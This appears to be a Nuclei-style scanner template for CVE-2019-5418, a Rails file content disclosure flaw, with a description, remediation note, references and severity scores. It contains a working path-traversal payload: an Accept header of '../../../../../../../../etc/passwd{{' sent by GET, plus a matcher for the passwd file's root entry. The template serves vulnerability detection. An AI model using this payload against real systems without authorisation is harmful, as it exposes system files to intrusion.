id: CVE-2019-5418 info: name: Rails File Content Disclosure author: omarkurt severity: high description: Rails <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 are susceptible to a file content disclosure vulnerability because specially crafted accept headers can cause contents of arbitrary files on the target system's file system to be exposed. remediation: | Apply the patch provided by the Rails team or upgrade to a version that includes the fix. reference: - https://github.com/omarkurt/CVE-2019-5418 - https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released/ - https://nvd.nist.gov/vuln/detail/CVE-2019-5418 - https://www.exploit-db.com/exploits/46585/ - http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00011.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-5418 cwe-id: CWE-22,NVD-CWE-noinfo epss-score: 0.97479 epss-percentile: 0.99963 cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: rubyonrails product: rails tags: cve,cve2019,rails,lfi,disclosure,edb,rubyonrails http: - method: GET path: - "{{BaseURL}}" headers: Accept: ../../../../../../../../etc/passwd{{ matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200 - 500 # digest: 490a004630440220175927410add52cd2a2ec0f2c31b5bd66a933367f1061e6879f7075f69d17d3e02204e5923dd1ca44c7710db156f4a25aa5fd38a5e02670a27dae03a1979c1ca7c56:922c64590222798bb761d5b6d8e72950